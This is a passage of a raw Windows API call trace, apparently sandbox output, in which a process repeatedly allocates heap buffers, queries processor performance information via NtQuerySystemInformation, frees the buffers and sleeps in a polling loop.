0xc0000004 [0241.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0241.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0241.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0241.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.125] Sleep (dwMilliseconds=0x110) [0241.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0241.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.139] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0241.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0241.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0241.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0241.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0241.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0241.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0241.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.142] Sleep (dwMilliseconds=0x110) [0241.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0241.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0241.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0241.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0241.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0241.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0241.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0241.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0241.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.157] Sleep (dwMilliseconds=0x110) [0241.169] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0241.169] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0241.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0241.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.170] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0241.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0241.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0241.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0241.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0241.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.172] Sleep (dwMilliseconds=0x110) [0241.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0241.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.185] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0241.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0241.185] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0241.186] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0241.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0241.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.188] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.188] Sleep (dwMilliseconds=0x110) [0241.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0241.201] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0241.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0241.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.202] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0241.202] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0241.202] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0241.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.203] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.203] Sleep (dwMilliseconds=0x110) [0241.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0241.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0241.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0241.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0241.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0241.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0241.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.219] Sleep (dwMilliseconds=0x110) [0241.231] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0241.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.232] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0241.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0241.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0241.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0241.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0241.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.235] Sleep (dwMilliseconds=0x110) [0241.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0241.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0241.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0241.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0241.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0241.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0241.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0241.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0241.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.250] Sleep (dwMilliseconds=0x110) [0241.263] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0241.263] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.263] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0241.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0241.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0241.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0241.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0241.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0241.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0241.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.266] Sleep (dwMilliseconds=0x110) [0241.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0241.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0241.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0241.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0241.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0241.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0241.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.281] Sleep (dwMilliseconds=0x110) [0241.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0241.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0241.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0241.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0241.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0241.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0241.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.301] Sleep (dwMilliseconds=0x110) [0241.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0241.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0241.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0241.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0241.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0241.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0241.317] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0241.317] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0241.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.318] Sleep (dwMilliseconds=0x110) [0241.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0241.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0241.332] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0241.332] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.333] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0241.333] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0241.333] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.334] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0241.334] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.335] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.335] Sleep (dwMilliseconds=0x110) [0241.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0241.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0241.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0241.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, 